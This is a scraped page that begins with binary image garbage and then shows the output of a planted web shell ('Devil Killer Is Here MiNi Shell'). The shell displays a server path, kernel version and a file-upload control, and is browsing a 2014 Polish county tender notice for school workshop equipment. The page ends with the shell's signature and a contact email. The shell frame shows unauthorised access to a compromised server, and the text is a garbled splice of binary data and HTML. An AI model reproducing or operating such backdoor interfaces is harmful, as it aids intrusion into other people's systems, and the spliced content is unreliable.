JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141028/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141028/357892-N-2014.html

<p class="kh_header"><b>Nowa Sól: Zakup, dostawa wyposażenia dydaktycznego i warsztatowego w ramach projektu pn.:
Modernizacja i doposażenie infrastruktury dydaktycznej i warsztatowej w Centrum Kształcenia
Zawodowego i Ustawicznego ELEKTRYK</b><br>
<b>Numer ogłoszenia: 357892 - 2014; data zamieszczenia: 28.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Nowosolski , ul. Moniuszki 3B, 67-100 Nowa Sól, woj. lubuskie, tel. 68 4586800, faks 68 4586831.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-nowosolski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup, dostawa wyposażenia dydaktycznego i warsztatowego w ramach projektu pn.:
Modernizacja i doposażenie infrastruktury dydaktycznej i warsztatowej w Centrum Kształcenia
Zawodowego i Ustawicznego ELEKTRYK.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Postępowanie prowadzone dla zamówienia publicznego o wartości szacunkowej poniżej 207 000
euro.
Przedmiotem zamówienia jest zakup, dostawa wyposażenia dydaktycznego i warsztatowego (dalej :
produkt) w ramach projektu pn.: Modernizacja i doposażenie infrastruktury dydaktycznej i warsztatowej
w Centrum Kształcenia Zawodowego i Ustawicznego ELEKTRYK.
Zadanie jest współfinansowane przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju
Regionalnego w ramach Lubuskiego Regionalnego Programu Operacyjnego na lata 2007-2013.
Zamawiający dopuszcza składanie ofert częściowych i podzielił zamówienie na 2 części (ZADANIA) :
ZADANIE NR 1 - zakup i dostawa pomocy dydaktycznych do pracowni mechatroniki
samochodowej;
ZADANIE NR 2 - zakup i dostawa pomocy i artykułów szkolnych.
Szczegółowy opis przedmiotu zamówienia poszczególnych części (ZADAŃ) określa załącznik nr 1B/nr
1 do 2 SIWZ tj. SPECYFIKACJE PRODUKTÓW.
Równoważność
1) Ewentualne nazwy własne znajdujące się w SIWZ bądź innym integralnym do SIWZ dokumencie
zostały przywołane przykładowo i nie mogą być traktowane jako rekomendacja ich nabycia,
użycia, czy promocji.
2) Zamawiający dopuszcza rozwiązania równoważne. Wskazane w SPECYFIAKCJACH
PRODUKTÓW, bądź innym integralnym do SIWZ dokumencie parametry materiałów, wyrobów,
systemów, urządzeń Zamawiający traktuje jako określenie nie gorszych - minimalnych wymagań
parametrów użytkowych, funkcjonalnych, technicznych lub standardów jakościowych (art.29 ust.3
ustawy pzp) .
3) Ciężar udowodnienia, że produkt jest równoważny w stosunku do wymogu określonego przez
Zamawiającego spoczywa na Wykonawcy (art.30 ust.5 ustawy pzp).
4) Wykonawca, który powołuje się na rozwiązania równoważne jest obowiązany na każde żądanie
Zamawiającego wykazać, że zaoferowane przez niego produkty są nie gorsze od produktów
wymaganych przez Zamawiającego.
5) W przypadku zaoferowania rozwiązań równoważnych, Wykonawca zobowiązany jest do dołączenia
do oferty
a) wykazu zastosowanych produktów równoważnych z podaniem ich nazwy i dokładnym opisem
parametrów;
b) dokumentów potwierdzających ich równoważność takich jak: parametry techniczne, jakościowe,
eksploatacyjne, funkcjonalność, certyfikaty, aprobaty techniczne z podaniem nazwy podmiotu
wydającego oraz terminu ważności dokumentu.
6) Zaoferowanie wyrobów lub materiałów równoważnych nie może prowadzić do zmiany przedmiotu
zamówienia.
Wymagania Zamawiającego
1) Przedmiot zamówienia musi być pierwszego gatunku, fabrycznie nowy i wolny od wad i od
obciążeń prawami osób trzecich .
2) Materiały, w stosunku do których istnieje obowiązek posiadania certyfikatu lub deklaracji
producenta / wykonawcy za zgodność z PN - mają być odpowiednio w nie zaopatrzone.
3) Produkt dostarczony w ramach niniejszego zamówienia będzie produktem zakupionym w
oficjalnym kanale sprzedaży producenta na rynek polski i będzie posiadać stosowny pakiet usług
gwarancyjnych i wsparcie techniczno - serwisowe kierowane do użytkowników obszaru
Rzeczypospolitej.
4) Okres gwarancji i rękojmi dla produktu wynosi min.24 miesiące. Gwarancja i rękojmia będzie
liczona od daty odbioru wszystkich produktów objętych daną częścią zamówienia, wraz z
nieodpłatną (wliczoną w cenę ofertową) naprawą w okresie gwarancyjnym realizowaną w miejscu
użytkowania, przez osoby lub podmioty posiadające stosowną autoryzację producenta, odpowiednio
do jednego z 2 części (ZADAŃ ) zamówienia. Szczegółowe wymagania w zakresie gwarancji i
serwisu zostały określone w Formularzu istotnych postanowień umowy - załącznik nr 5 do SIWZ.
5) Oferta musi być jednoznaczna i kompleksowa tj. obejmować cały asortyment przedmiotu
zamówienia odpowiednio do wybranej przez Wykonawcę części (ZADANIA ).
6) Wykonawca dostarczy przedmiot zamówienia do miejsca wskazanego przez zamawiającego
własnym transportem, na własny koszt i na własne ryzyko oraz dokona rozładunku dysponowanymi
zasobami ludzkimi i sprzętowymi w miejscu wskazanym przez Zamawiającego, w terminie
określonym w SIWZ.
7) Wykonawca przeszkoli wskazane przez Zamawiającego osoby (min. 2 os.) w zakresie obsługi
dostarczanego przez siebie przedmiotu zamówienia.
8) Wykonawca dostarczy z przedmiotem zamówienia wszelkie niezbędne dokumenty - w języku
polskim - konieczne do prawidłowego korzystania z dostarczonych produktów , karty gwarancyjne
certyfikaty, atesty, aprobaty techniczne, deklaracje zgodności, instrukcje, schematy oraz inne
dokumenty wymagane odrębnymi przepisami prawa .
9) Wykonawca ma obowiązek dołączyć do składanej oferty wypełnioną TABELĘ CEN na wybraną
część (ZADANIE) sporządzoną wg wzoru załącznik nr 1A/nr 1 - 2.
10) Wszelkie dodatkowe informacje zawiera Formularz istotnych postanowień umowy (zał. nr 5 do
SIWZ), z którym Wykonawca ma obowiązek się zapoznać.
Kod i nazwa zamówienia wg Wspólnego Słownika Zamówień (CPV):
Kod CPV Opis
38.90.00.00 - 4 Różne przyrządy do badań lub testowania
38.97.00.00 - 5 Badawcze testowe i naukowe symulatory techniczne
39.16.21.10 - 9 Sprzęt dydaktyczny
39.16.21.00 - 6 Pomoce dydaktyczne
39.16.22.00 - 7 Pomoce i artykuły szkolne.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 38.90.00.00-4, 38.97.00.00-5, 39.16.21.10-9, 39.16.21.00-6, 39.16.22.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienie wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunków w tym zakresie.
Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu w tym zakresie na
podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunków w tym zakresie.
Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu w tym zakresie na
podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunków w tym zakresie.
Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu w tym zakresie na
podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunków w tym zakresie.
Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu w tym zakresie na
podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunków w tym zakresie.
Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu w tym zakresie na
podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty wymagane w ofercie:
1) wypełniony Formularz oferty - sporządzony wg wzoru załącznik nr 1 do SIWZ;
2) wypełniona Tabela cen - sporządzona wg wzoru załącznik nr 1A/nr 1 do 2 do SIWZ (w zależności
od wybranej części przedmiotu zamówienia);
3) oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu określonych w art.22
ust.1 - sporządzony wg wzoru załącznik nr 2 do SIWZ;
4) oświadczenie Wykonawcy o braku podstaw do wykluczenia na podstawie art.24 ust.1 i 2 -
sporządzony wg wzoru załącznik nr 3 do SIWZ;
5) informacja o przynależności do grupy kapitałowej - sporządzony wg wzoru załącznik nr 4 do SIWZ;
6) pełnomocnictwo do złożenia oferty - w przypadku, gdy umocowanie prawne do reprezentacji
wykonawcy nie wynika z przepisów prawa lub z dokumentów rejestrowych złożonych wraz z ofertą.
Pełnomocnictwo należy złożyć w oryginale lub notarialnie poświadczonej kopii;
7) pozostałe oświadczenia i dokumenty, o których mowa w ust. 7 SIWZ.
Uwaga:
Zamawiającemu przysługuje prawo do żądania przedstawienia oryginału dokumentu lub jego kopii
poświadczonej notarialnie w sytuacji, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna
lub budzi wątpliwości co do jej autentyczności.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres gwarancji - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Z Wykonawcą, który złoży najkorzystniejszą ofertę zostanie zawarta umowa, której projekt stanowi
Formularz istotnych postanowień umowy - załącznik nr 5 do SIWZ.
2. Ewentualne zmiany dokonane przez Wykonawcę w przywołanym powyżej formularzu nie będą przez
Zamawiającego uwzględnione.
3. Zamawiający dopuszcza możliwość zmian zawartej umowy w stosunku do treści oferty Wykonawcy
gdy:
1) nastąpi istotna zmiana przepisów lub norm mających zastosowanie do przedmiotu zamówienia;
2) nastąpi zmiana stawki podatku VAT;
3) wystąpią okoliczności, za które Wykonawca nie ponosi odpowiedzialności, skutkujące
niemożnością dotrzymania przez niego terminu realizacji - wówczas termin ten może ulec
wydłużeniu, nie dłużej jednak niż o czas trwania tych okoliczności;
4) konieczne będzie wprowadzenie zmian dotyczących treści o charakterze informacyjnym bądź
instrukcyjnym, niezbędnym do realizacji umowy;
5) wyłączona zostanie część dostaw objętych umową na wniosek Zamawiającego;
6) konieczność wprowadzenia zmian będzie następstwem zmian w zawartej przez Zamawiającego
umowie o dofinansowanie projektu, zmian wytycznych dotyczących realizacji projektu lub zaleceń
instytucji, która przyznała środki na sfinansowanie zamówienia;
7) zaistnieje siła wyższa lub inna, niemożliwa do przewidzenia w momencie zawarcia umowy,
okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi
odpowiedzialności skutkująca brakiem możliwości należytego wykonania umowy zgodnie z SIWZ
lub gdy wprowadzenie tych zmian jest korzystne dla Zamawiającego;
8) wszczęte zostanie postępowanie upadłościowe lub otwarcie likwidacji Wykonawcy - wówczas
nastąpi rozwiązanie umowy bez zachowania okresu wypowiedzenia.
4. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić
zgodę. Nie stanowią one jednak zobowiązania do wyrażenia takiej zgody.
3. Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy pzp:
1) zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana nr
rachunku bankowego),
2) zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między stronami,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat-nowosolski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe, ul. Moniuszki 3b, 67-100 Nowa Sól, pok.201.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.11.2014 godzina 09:00, miejsce: Powiat Nowosolski z siedzibą Starostwa Powiatowego,
Ul. Moniuszki 3b, 67-100 Nowa Sól,
Sekretariat - I piętro - pok.109.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju
Regionalnego w ramach Lubuskiego Regionalnego Programu Operacyjnego na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> zakup i dostawa pomocy dydaktycznych do pracowni mechatroniki
samochodowej;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Postępowanie prowadzone dla zamówienia publicznego o wartości szacunkowej poniżej 207 000
euro.Przedmiotem zamówienia jest zakup, dostawa wyposażenia dydaktycznego i warsztatowego (dalej :
produkt) w ramach projektu pn.: Modernizacja i doposażenie infrastruktury dydaktycznej i warsztatowej
w Centrum Kształcenia Zawodowego i Ustawicznego ELEKTRYK.
Zadanie jest współfinansowane przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju
Regionalnego w ramach Lubuskiego Regionalnego Programu Operacyjnego na lata 2007-2013.
Zamawiający dopuszcza składanie ofert częściowych i podzielił zamówienie na 2 części (ZADANIA) :
ZADANIE NR 1 - zakup i dostawa pomocy dydaktycznych do pracowni mechatroniki
samochodowej;
ZADANIE NR 2 - zakup i dostawa pomocy i artykułów szkolnych.
Szczegółowy opis przedmiotu zamówienia poszczególnych części (ZADAŃ) określa załącznik nr 1B/nr
1 do 2 SIWZ tj. SPECYFIKACJE PRODUKTÓW..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.90.00.00-4, 38.97.00.00-5, 39.16.21.10-9, 39.16.21.00-6, 39.16.22.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> zakup i dostawa pomocy i artykułów szkolnych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Postępowanie prowadzone dla zamówienia publicznego o wartości szacunkowej poniżej 207 000
euro.Przedmiotem zamówienia jest zakup, dostawa wyposażenia dydaktycznego i warsztatowego (dalej :
produkt) w ramach projektu pn.: Modernizacja i doposażenie infrastruktury dydaktycznej i warsztatowej
w Centrum Kształcenia Zawodowego i Ustawicznego ELEKTRYK.
Zadanie jest współfinansowane przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju
Regionalnego w ramach Lubuskiego Regionalnego Programu Operacyjnego na lata 2007-2013.
Zamawiający dopuszcza składanie ofert częściowych i podzielił zamówienie na 2 części (ZADANIA) :
ZADANIE NR 1 - zakup i dostawa pomocy dydaktycznych do pracowni mechatroniki
samochodowej;
ZADANIE NR 2 - zakup i dostawa pomocy i artykułów szkolnych.
Szczegółowy opis przedmiotu zamówienia poszczególnych części (ZADAŃ) określa załącznik nr 1B/nr
1 do 2 SIWZ tj. SPECYFIKACJE PRODUKTÓW..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.90.00.00-4, 38.97.00.00-5, 39.16.21.10-9, 39.16.21.00-6, 39.16.22.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com